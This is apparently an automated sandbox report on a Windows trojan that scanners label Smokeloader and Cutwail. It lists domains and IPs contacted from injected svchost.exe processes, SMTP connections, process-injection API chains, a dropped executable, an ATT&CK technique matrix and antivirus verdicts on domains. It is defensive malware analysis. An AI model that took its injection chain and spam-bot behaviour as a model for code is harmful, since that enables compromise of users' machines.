              Source: C:\Windows\SysWOW64\svchost.exeDomain query: a-domani.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.232.25.17 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettlinx.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: softizer.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: rokoron.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jroy.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbp-jp.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: doggybag.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.rs-ag.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.197.121.220 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.72.176.26 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: htsmx.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.181.161.11 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dwid.de
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.181 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: skypearl.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludea.cz
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.188.2.51 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 38.36.96.76 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: esmoke.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: simetar.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: btsi.com.ph
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: agulatex.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gcss.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 64.18.191.61 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.130.4.196 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.158.251 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: leapc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: magicomm.co.uk
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: xsui.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nolaoig.org
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.106.129.180 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dyag-eng.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: hchc.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: webband.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: keio-web.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.100.146.220 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: 603888.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: ascc.org.au
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: canmore.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: pertex.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shenhgts.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.medisa.info
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.231.13.148 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.mail.yahoo.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: rappich.de
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.163.101 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: insia.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.130.253.23 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.89 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: biurohera.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: agitz.com.br
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: wantapc.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: duiops.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.15.12.103 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.200.51.73 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mcseurope.nl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: orbitgas.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.1.81.28 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: fogra.com.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: polprime.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nrsi.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: mondopp.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.39.198.18 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.253.63.27 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: deckoviny.cz
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: roewer.de
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettle.pl
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: diamir.de
              Source: C:\Users\user\pigalicapi.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 7FAB0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7FAB0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFC0000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7E510000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D20B0 GetEnvironmentVariableA,lstrcatA,lstrcatA,lstrcatA,VirtualAlloc,CreateProcessA,VirtualFree,VirtualAllocEx,VirtualAllocEx,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,VirtualFree,GetThreadContext,TerminateProcess,CloseHandle,CloseHandle,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,1_2_005D20B0
              Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7FAB0000Jump to behavior
              Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 448008Jump to behavior
              Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
              Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: AFC008Jump to behavior
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D2510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,1_2_005D2510
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_04001DC0 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,11_2_04001DC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_131451E8 GetTickCount,GetCommandLineA,StrStrA,CreateProcessA,VirtualAllocEx,TerminateProcess,WriteProcessMemory,GetTickCount,WriteProcessMemory,GetTickCount,GetTickCount,WriteProcessMemory,CreateRemoteThread,GetLastError,CloseHandle,14_2_131451E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_131451F8 GetTickCount,GetCommandLineA,StrStrA,CreateProcessA,VirtualAllocEx,TerminateProcess,WriteProcessMemory,GetTickCount,WriteProcessMemory,GetTickCount,GetTickCount,WriteProcessMemory,CreateRemoteThread,GetLastError,CloseHandle,15_2_131451F8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_131451F8 GetTickCount,GetCommandLineA,StrStrA,CreateProcessA,VirtualAllocEx,TerminateProcess,WriteProcessMemory,GetTickCount,WriteProcessMemory,GetTickCount,GetTickCount,WriteProcessMemory,CreateRemoteThread,GetLastError,CloseHandle,16_2_131451F8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_131451E8 GetTickCount,GetCommandLineA,StrStrA,CreateProcessA,VirtualAllocEx,TerminateProcess,WriteProcessMemory,GetTickCount,WriteProcessMemory,GetTickCount,GetTickCount,WriteProcessMemory,CreateRemoteThread,GetLastError,CloseHandle,21_2_131451E8
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,14_2_131565DC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,15_2_131565EC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,16_2_131565EC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,21_2_131565DC
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0120D426 cpuid 1_2_0120D426
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D7250 wsprintfA,RegOpenKeyExA,RegQueryValueExA,GetLocalTime,RegCloseKey,1_2_005D7250
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_13147359 GetTimeZoneInformation,GetTickCount,SystemTimeToFileTime,wsprintfA,14_2_13147359
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0121310F CreateNamedPipeA,1_2_0121310F
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D8F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,1_2_005D8F80

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 1.2.pigalicapi.exe.5d0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.pigalicapi.exe.5d0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.4000000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts23
              Native API
              1
              Windows Service
              1
              Access Token Manipulation
              111
              Masquerading
              OS Credential Dumping2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              Exfiltration Over Other Network Medium21
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              Data Encrypted for Impact
              Default AccountsScheduled Task/Job1
              Registry Run Keys / Startup Folder
              1
              Windows Service
              121
              Virtualization/Sandbox Evasion
              LSASS Memory341
              Security Software Discovery
              Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
              Ingress Tool Transfer
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)612
              Process Injection
              1
              Access Token Manipulation
              Security Account Manager121
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)1
              Registry Run Keys / Startup Folder
              612
              Process Injection
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer25
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information
              LSA Secrets1
              Application Window Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
              Remote System Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              File and Directory Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow35
              System Information Discovery
              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1308712 Sample: OWd39WUX3D.exe Startdate: 15/09/2023 Architecture: WINDOWS Score: 100 47 workplus.hu 2->47 49 orbitgas.com 2->49 51 331 other IPs or domains 2->51 103 Snort IDS alert for network traffic 2->103 105 Multi AV Scanner detection for domain / URL 2->105 107 Antivirus detection for URL or domain 2->107 113 5 other signatures 2->113 8 OWd39WUX3D.exe 3 68 2->8         started        13 pigalicapi.exe 48 2->13         started        signatures3 109 System process connects to network (likely due to code injection or exploit) 49->109 111 Tries to resolve many domain names, but no domain seems valid 49->111 process4 dnsIp5 53 shiner.com 8->53 55 pro-fa.com 8->55 61 191 other IPs or domains 8->61 45 C:\Users\user\pigalicapi.exe, PE32 8->45 dropped 115 Drops PE files to the user root directory 8->115 15 svchost.exe 8->15         started        19 svchost.exe 8->19         started        21 svchost.exe 8->21         started        57 toundo.net 13->57 59 pro-fa.com 13->59 63 158 other IPs or domains 13->63 117 Antivirus detection for dropped file 13->117 119 Multi AV Scanner detection for dropped file 13->119 121 Machine Learning detection for dropped file 13->121 127 7 other signatures 13->127 23 svchost.exe 13->23         started        25 svchost.exe 13->25         started        file6 123 Tries to resolve many domain names, but no domain seems valid 53->123 125 System process connects to network (likely due to code injection or exploit) 59->125 signatures7 process8 dnsIp9 79 smtp.mail.global.gm0.yahoodns.net 15->79 81 mail.airmail.net 66.226.70.66 INFB2-ASUS United States 15->81 83 smtp.mail.yahoo.com 15->83 91 System process connects to network (likely due to code injection or exploit) 15->91 93 Injects a PE file into a foreign processes 15->93 27 svchost.exe 15->27         started        31 svchost.exe 12 15->31         started        33 svchost.exe 12 15->33         started        35 svchost.exe 2 12 15->35         started        95 Found evasive API chain (may stop execution after checking mutex) 19->95 97 Found stalling execution ending in API Sleep call 19->97 99 Contains functionality to inject threads in other processes 19->99 101 Contains functionality to detect sleep reduction / modifications 19->101 85 smtp.cs.com 23->85 87 smtp.compuserve.com 23->87 89 4 other IPs or domains 23->89 37 svchost.exe 23->37         started        39 svchost.exe 23->39         started        41 svchost.exe 23->41         started        43 svchost.exe 23->43         started        signatures10 process11 dnsIp12 65 usadig.com 27->65 67 tabbles.net 27->67 71 322 other IPs or domains 27->71 129 System process connects to network (likely due to code injection or exploit) 27->129 131 Opens the same file many times (likely Sandbox evasion) 27->131 73 83 other IPs or domains 31->73 69 nts-web.net 33->69 75 131 other IPs or domains 33->75 77 41 other IPs or domains 35->77 signatures13

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              OWd39WUX3D.exe30%ReversingLabsWin32.Trojan.Smokeloader
              OWd39WUX3D.exe100%AviraTR/AD.Cutwail.rludr
              OWd39WUX3D.exe38%VirustotalBrowse
              OWd39WUX3D.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\pigalicapi.exe100%AviraTR/AD.Cutwail.rludr
              C:\Users\user\pigalicapi.exe100%Joe Sandbox ML
              C:\Users\user\pigalicapi.exe30%ReversingLabsWin32.Trojan.Smokeloader
              No Antivirus matches
              SourceDetectionScannerLabelLink
              impexnc.com0%VirustotalBrowse
              holp-ai.com2%VirustotalBrowse
              webways.com9%VirustotalBrowse
              dayvo.com2%VirustotalBrowse
              www.fcwcvt.org1%VirustotalBrowse
              shteeble.com2%VirustotalBrowse
              enguita.net1%VirustotalBrowse
              evcpa.com1%VirustotalBrowse
              dataform.co.uk0%VirustotalBrowse
              shittas.com3%VirustotalBrowse
              kallman.net0%VirustotalBrowse
              pohlfood.com1%VirustotalBrowse
              avse.hu4%VirustotalBrowse
              notis.ru2%VirustotalBrowse
              www.tyrns.com9%VirustotalBrowse
              nts-web.net2%VirustotalBrowse
              jsaps.com0%VirustotalBrowse
              missnue.com1%VirustotalBrowse
              www.vexcom.com2%VirustotalBrowse
              gphpedit.org0%VirustotalBrowse
              tcpoa.com2%VirustotalBrowse
              canasil.com2%VirustotalBrowse
              www.jenco.co.uk0%VirustotalBrowse
              shesfit.com1%VirustotalBrowse
              www.mobilnic.net3%VirustotalBrowse
              www.sclover3.com2%VirustotalBrowse
              kevyt.net3%VirustotalBrowse
              s5w.com9%VirustotalBrowse
              dog-jog.net2%VirustotalBrowse
              kamptal.at1%VirustotalBrowse
              adventist.ro1%VirustotalBrowse
              in1.smtp.messagingengine.com0%VirustotalBrowse
              bd-style.com8%VirustotalBrowse
              zupraha.cz3%VirustotalBrowse
              isom.org0%VirustotalBrowse
              any-s.net6%VirustotalBrowse
              muhr-soehne.de0%VirustotalBrowse
              www.edimart.hu3%VirustotalBrowse
              www.railbook.net4%VirustotalBrowse
              oaith.ca2%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik0%Avira URL Cloudsafe
              https://www.stajerskagz.si/o-sgz-2/0%Avira URL Cloudsafe
              https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg0%Avira URL Cloudsafe
              http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.620%Avira URL Cloudsafe
              http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.00%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/0%Avira URL Cloudsafe
              https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-150x150.jpg0%Avira URL Cloudsafe
              http://skypearl.com/0%Avira URL Cloudsafe
              http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc0%Avira URL Cloudsafe
              https://www.pcgrate.com/#webpage0%Avira URL Cloudsafe
              https://pohlfood.com/#website0%Avira URL Cloudsafe
              https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svg0%Avira URL Cloudsafe
              https://inhouse.pohlfood.com/0%Avira URL Cloudsafe
              http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=26c380492a5e27db8a412ecdd0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/0%Avira URL Cloudsafe
              http://www.pcgrate.com/wp-content/uploads/the7-css/post-type-dynamic.css?ver=c08792de11d20%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritev0%Avira URL Cloudsafe
              http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js0%Avira URL Cloudsafe
              http://gpthink.com/product/204.html100%Avira URL Cloudmalware
              http://univi.it/0%Avira URL Cloudsafe
              http://likangds.com/0%Avira URL Cloudsafe
              https://www.clinicasanluis.com.co/0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pretvorniki-tlaka-wika/0%Avira URL Cloudsafe
              http://www.elpro.si/0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/prikazovalniki-temperature/0%Avira URL Cloudsafe
              http://pohlfood.com/wp-content/uploads/elementor/css/post-330.css?ver=16945532660%Avira URL Cloudsafe
              http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.0%Avira URL Cloudsafe
              https://www.pwd.org/0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/0%Avira URL Cloudsafe
              http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver0%Avira URL Cloudsafe
              https://www.elpro.si/avtorji/0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/0%Avira URL Cloudsafe
              http://www.credo.edu.pl/100%Avira URL Cloudmalware
              http://sigtoa.com/0%Avira URL Cloudsafe
              http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver0%Avira URL Cloudsafe
              https://pohlfood.com/comments/feed/0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni0%Avira URL Cloudsafe
              https://www.aevga.com/100%Avira URL Cloudmalware
              http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.250%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/0%Avira URL Cloudsafe
              http://www.naoi-a.com/0%Avira URL Cloudsafe
              http://www.myropcb.com/services-capabilities/pcb-restoration/0%Avira URL Cloudsafe
              http://www.abdg.com/0%Avira URL Cloudsafe
              http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.10%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/0%Avira URL Cloudsafe
              http://www.myropcb.com/services-capabilities/stencil/0%Avira URL Cloudsafe
              http://www.valselit.com/177-appartement-a-vendre-sigean-30378100%Avira URL Cloudmalware
              http://www.myropcb.com/why-use-myro/0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/pretvorniki-nivoja/0%Avira URL Cloudsafe
              http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.00%Avira URL Cloudsafe
              http://gholographic.com/0%Avira URL Cloudsafe
              http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.00%Avira URL Cloudsafe
              http://calvinly.com/0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/podaljski-za-termoclene-termoelemen0%Avira URL Cloudsafe
              https://www.ora-ito.com/0%Avira URL Cloudsafe
              https://tickets.suresupport.com/faq/article-1596/en0%Avira URL Cloudsafe
              http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.00%Avira URL Cloudsafe
              http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)0%Avira URL Cloudsafe
              https://www.lrsuk.com/0%Avira URL Cloudsafe
              https://www.elpro.si/kategorija-izdelka/wika-partner/0%Avira URL Cloudsafe
              http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub0%Avira URL Cloudsafe
              http://myropcb.com/login/0%Avira URL Cloudsafe
              http://www.winhui.cn/template/default/img/fixedimg4.png0%Avira URL Cloudsafe
              http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.90%Avira URL Cloudsafe
